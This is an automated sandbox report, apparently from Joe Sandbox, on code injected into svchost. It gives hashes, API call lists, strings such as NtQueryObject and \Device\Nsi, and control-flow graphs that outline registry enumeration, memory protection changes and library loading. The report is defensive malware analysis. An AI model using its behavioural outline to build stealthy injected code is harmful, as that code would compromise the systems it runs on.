                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: d052b1c46727c19f43efd8b7e0256fe62ff6537c43c5cc0f5a60b0815a9477fd
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: DF81AC22B10650A9FB529BEDD8487AD27F0B754BD8FE44116FA0A5369ADB3484E3C330
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 2e75c9d66f1ae270a0ccae9c8ac8bc829f1075925da208cb5abb1be85d45c1d2
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 0861BC36619B44D6E7618B99F45831A77A0F3C8784FA00116FA8D47BACDB7CC5A2CF10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: d00fc3ff6a8a2feef3ba3802974e7caae69bdcfd36a4a00ff7f8a0dc82fe5ffb
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: B811A922B56E0121F69A11ECE85E76910517B643F4FF46625FE77063DF8B548CE34134
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: bba08c75069eb4ae0592ef4de81ae1046e0182a33f185f0024a95fadd8ac3b44
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: D811C622B5FE1461F66611EEE47EB6D10406B553B4FC80624FA7646FDE8B188CE34127
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: d9f4ad6a2dca8628e2ea8d3bc8c82d10d9319df7426a2d87402df6b7559ee48c
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 6A118E2A705B4092FB169BA9F41836967B0F788B90F980029EF9907798EF3DC596C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 01f5ff1fb9b5be4ee618e3ccf9128f27f383dc818439f1e97fcf397e8e08a064
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: FA51D772712600ABDB1ACF6DD448B193B95FB54B98FD18124FA164774CDB34C8E2C726
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 54cef47eacf2fdafb8c6ab38e85dc36da4425aedc6f44c8e3f84c76bb3317c6d
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 9931AF72311750F6E71ADF69E8487193BA4FB40B98F958014FE5A4774CCB38C9A2C726
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: c4733d2196c257afb400b46f69818893e68172c46ec69e2d92d4166db854acf0
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: 1B118132614F84E2E751CFAAF80825A7360F78ABD0F544029EB9A03718DF38C0A2C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: a24aa7111778482f37dc46ad5fb1c8f263fadef3bef945fd79dc8ec058fcd767
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 8071E33230078162EB669FADA9583AE6790F785BC4FC44026FE4943B8DDE34C9E6C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: bd4259202f19020f7acc39bfef5f09d3a58e72965e4eacd60525bfbc4f07c94f
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 00511A3230478162FA369EADB15C3AA6651F385784FD40025FF9A07B9DDE35C4A7CB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 1165dc7b861e08b73f9ddd0575140fde1ab06b2083633807e1a2c32ed641343a
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: BD41A372314A80A5EB619F6DE4593AAA7A0F3887D4F904025FE4D87798EF3CC592CB50
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: b6ec0e3822f44f4974ba45c3b4ad031aafea858d39a4be114183cc4bad7c1915
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 4211F736708B9096DB618B5AB44429AB7A4F789BD0F944126EACD83B59DF38C4A1CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 4206efeffc6ca744a8ee94f67e3cfb921d441615101c791e442dbefb7a6d9b88
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 4B111F32214B8092EB618F59F44425977A5F788B98F584225EF9D0B768DF38C5A6CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: ec8b7fb54daf39842dfd8d2727fb0fe77053afe0efa68e6c8063deca0273b5df
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: B0F08921710790A1FB175BD9F4485556321A788BD0FE85416FA5903B5CCE38C5F6C720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: b9f947fcaab863fd034a458c7f8bf2b871c006b774413eff4daedb7773ba97b7
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: F9E0E561310640B1FE175BD9F84D6A56262AB887C0FE89526F6590635DCE38C8F7C720
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 422ad1516d5ea61ae22fb89c8dd9457b7e4e0eded744485d61e6f54fbbe180c5
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 58E09221308941B2EA079FDDF44C2E472619F94740FE9A021F9190625EDE3CC8F78361
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: d49fae6660e039afaef4af6e963e2af9471fcf4aa3129fb68c4f1e8e86d27fa2
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: B7218322705B8095EF128F9DF40866AF7A0FB84BA4F954120EE8C47B18EE78C5A3C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 6d1deb667d001a1ddb2ab59ec8eef6bc1084919400beab451ae0fb92074640fd
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 1EE06D71711600D6F7058FAAD8083493BE1FB89FA1F98C024CA1907354DF7D84EAC760

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 14031 25306e61c28 14036 25306e61650 GetProcessHeap HeapAlloc 14031->14036 14033 25306e61c3e Sleep SleepEx 14034 25306e61c37 14033->14034 14034->14033 14035 25306e615c0 StrCmpIW StrCmpW 14034->14035 14035->14034 14080 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14036->14080 14038 25306e61678 14081 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14038->14081 14040 25306e61689 14082 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14040->14082 14042 25306e61692 14083 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14042->14083 14044 25306e6169b 14045 25306e616b6 RegOpenKeyExW 14044->14045 14046 25306e616e8 RegOpenKeyExW 14045->14046 14047 25306e618ce 14045->14047 14048 25306e61727 RegOpenKeyExW 14046->14048 14049 25306e61711 14046->14049 14047->14034 14051 25306e61762 RegOpenKeyExW 14048->14051 14052 25306e6174b 14048->14052 14084 25306e612c8 RegQueryInfoKeyW 14049->14084 14055 25306e61786 14051->14055 14056 25306e6179d RegOpenKeyExW 14051->14056 14094 25306e6104c RegQueryInfoKeyW 14052->14094 14060 25306e612c8 16 API calls 14055->14060 14057 25306e617d8 RegOpenKeyExW 14056->14057 14058 25306e617c1 14056->14058 14063 25306e61813 RegOpenKeyExW 14057->14063 14064 25306e617fc 14057->14064 14062 25306e612c8 16 API calls 14058->14062 14061 25306e61793 RegCloseKey 14060->14061 14061->14056 14065 25306e617ce RegCloseKey 14062->14065 14067 25306e61837 14063->14067 14068 25306e6184e RegOpenKeyExW 14063->14068 14066 25306e612c8 16 API calls 14064->14066 14065->14057 14069 25306e61809 RegCloseKey 14066->14069 14070 25306e6104c 6 API calls 14067->14070 14071 25306e61889 RegOpenKeyExW 14068->14071 14072 25306e61872 14068->14072 14069->14063 14075 25306e61844 RegCloseKey 14070->14075 14073 25306e618c4 RegCloseKey 14071->14073 14074 25306e618ad 14071->14074 14076 25306e6104c 6 API calls 14072->14076 14073->14047 14078 25306e6104c 6 API calls 14074->14078 14075->14068 14077 25306e6187f RegCloseKey 14076->14077 14077->14071 14079 25306e618ba RegCloseKey 14078->14079 14079->14073 14080->14038 14081->14040 14082->14042 14083->14044 14085 25306e61499 RegCloseKey 14084->14085 14086 25306e61334 GetProcessHeap HeapAlloc 14084->14086 14085->14048 14087 25306e61485 GetProcessHeap HeapFree 14086->14087 14088 25306e6135d RegEnumValueW 14086->14088 14087->14085 14092 25306e613af 14088->14092 14090 25306e6142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14090->14092 14091 25306e613dd GetProcessHeap HeapAlloc 14091->14092 14092->14087 14092->14088 14092->14090 14092->14091 14093 25306e61413 GetProcessHeap HeapFree 14092->14093 14100 25306e61554 14092->14100 14093->14090 14095 25306e611b5 RegCloseKey 14094->14095 14097 25306e610b9 14094->14097 14095->14051 14096 25306e610c7 RegEnumValueW 14096->14097 14097->14095 14097->14096 14098 25306e61149 GetProcessHeap HeapAlloc 14097->14098 14099 25306e6117f GetProcessHeap HeapFree 14097->14099 14098->14097 14099->14097 14101 25306e615a4 14100->14101 14102 25306e6156e 14100->14102 14101->14092 14102->14101 14103 25306e61585 StrCmpIW 14102->14103 14104 25306e6158d StrCmpW 14102->14104 14103->14102 14104->14102 14105 253067d2908 14107 253067d2936 14105->14107 14106 253067d2a2b LoadLibraryA 14106->14107 14107->14106 14108 253067d2aa7 14107->14108

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: b4f454186f7518bad22eb1b959e946b12c2d53c60afc66e4c5c4ed66010226e7
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 81117C34610F6181F761D7A1AF0E39A6690B7943C7F443029A9168B1DCEF7AC245C208

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000025306E61650: GetProcessHeap.KERNEL32 ref: 0000025306E6165B
                                                  • Part of subcall function 0000025306E61650: HeapAlloc.KERNEL32 ref: 0000025306E6166A
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E616DA
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61707
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61721
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61741
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6175C
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6177C
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61797
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617B7
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E617D2
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617F2
                                                • Sleep.KERNEL32 ref: 0000025306E61C43
                                                • SleepEx.KERNEL32 ref: 0000025306E61C49
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6180D
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6182D
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61848
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61868
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61883
                                                  • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E618A3
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618BE
                                                  • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618C8
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: c96dbdf56c7b06dc75e875730af0182cb125b9de197d4399fdb0d2334372bebe
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: AB31F175200F2191FB52DFBAEF4939E12A4AB44BC7F047425AE09C76DEEE34CA50C658

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 25306e63930-25306e6393b 58 25306e63955-25306e6395c 57->58 59 25306e6393d-25306e63950 StrCmpNIW 57->59 59->58 60 25306e63952 59->60 60->58
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: d1cd3ae0d87e9f1448effe114ad9020b15a3ec25e0177666e4fb2723d12cce83
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: B2D05E24311B5B86EB64DFE59D892652350AB047DAF44B1208A010319DDB289A8DCB18

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: c1b1a8673df87b556c8a500f35a566ad28f2268a4018f20ed08d70a0e42731f4
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 28610222301B6087EA68CF159848778B3A1FB44FD5F549825DF29877CBEA38DA53C708

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 25306e62cdc-25306e62d55 call 25306e7ecc0 210 25306e63090-25306e630b3 207->210 211 25306e62d5b-25306e62d61 207->211 211->210 212 25306e62d67-25306e62d6a 211->212 212->210 213 25306e62d70-25306e62d73 212->213 213->210 214 25306e62d79-25306e62d89 GetModuleHandleA 213->214 215 25306e62d9d 214->215 216 25306e62d8b-25306e62d9b call 25306e73090 214->216 217 25306e62da0-25306e62dbe 215->217 216->217 217->210 221 25306e62dc4-25306e62de3 StrCmpNIW 217->221 221->210 222 25306e62de9-25306e62ded 221->222 222->210 223 25306e62df3-25306e62dfd 222->223 223->210 224 25306e62e03-25306e62e0a 223->224 224->210 225 25306e62e10-25306e62e23 224->225 226 25306e62e25-25306e62e31 225->226 227 25306e62e33 225->227 228 25306e62e36-25306e62e3a 226->228 227->228 229 25306e62e4a 228->229 230 25306e62e3c-25306e62e48 228->230 231 25306e62e4d-25306e62e57 229->231 230->231 232 25306e62f4d-25306e62f51 231->232 233 25306e62e5d-25306e62e60 231->233 234 25306e62f57-25306e62f5a 232->234 235 25306e63082-25306e6308a 232->235 236 25306e62e72-25306e62e7c 233->236 237 25306e62e62-25306e62e6f call 25306e61a14 233->237 241 25306e62f6b-25306e62f75 234->241 242 25306e62f5c-25306e62f68 call 25306e61a14 234->242 235->210 235->225 239 25306e62eb0-25306e62eba 236->239 240 25306e62e7e-25306e62e8b 236->240 237->236 245 25306e62eea-25306e62eed 239->245 246 25306e62ebc-25306e62ec9 239->246 240->239 244 25306e62e8d-25306e62e9a 240->244 248 25306e62f77-25306e62f84 241->248 249 25306e62fa5-25306e62fa8 241->249 242->241 253 25306e62e9d-25306e62ea3 244->253 255 25306e62eef-25306e62ef9 call 25306e61d28 245->255 256 25306e62efb-25306e62f08 lstrlenW 245->256 246->245 254 25306e62ecb-25306e62ed8 246->254 248->249 250 25306e62f86-25306e62f93 248->250 251 25306e62faa-25306e62fb3 call 25306e61d28 249->251 252 25306e62fb5-25306e62fc2 lstrlenW 249->252 258 25306e62f96-25306e62f9c 250->258 251->252 268 25306e62ffa-25306e63005 251->268 264 25306e62fe5-25306e62fef call 25306e63930 252->264 265 25306e62fc4-25306e62fce 252->265 262 25306e62ea9-25306e62eae 253->262 263 25306e62f43-25306e62f48 253->263 266 25306e62edb-25306e62ee1 254->266 255->256 255->263 259 25306e62f0a-25306e62f14 256->259 260 25306e62f2b-25306e62f3d call 25306e63930 256->260 258->268 269 25306e62f9e-25306e62fa3 258->269 259->260 270 25306e62f16-25306e62f29 call 25306e61554 259->270 260->263 273 25306e62ff2-25306e62ff4 260->273 262->239 262->253 263->273 264->273 265->264 274 25306e62fd0-25306e62fe3 call 25306e61554 265->274 266->263 275 25306e62ee3-25306e62ee8 266->275 278 25306e63007-25306e6300b 268->278 279 25306e6307c-25306e63080 268->279 269->249 269->258 270->260 270->263 273->235 273->268 274->264 274->268 275->245 275->266 284 25306e63013-25306e6302d call 25306e686a0 278->284 285 25306e6300d-25306e63011 278->285 279->235 288 25306e63030-25306e63033 284->288 285->284 285->288 291 25306e63035-25306e63053 call 25306e686a0 288->291 292 25306e63056-25306e63059 288->292 291->292 292->279 294 25306e6305b-25306e63079 call 25306e686a0 292->294 294->279
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 3515bfe7e7b7ab6fad81b4b4882aab1bc66bcefd9e350348560311820e22c634
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 4AB19E32210FA085EBA5CFA5CA4879963A5F744BC6F547026FE09577D8EB35CB44C348

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
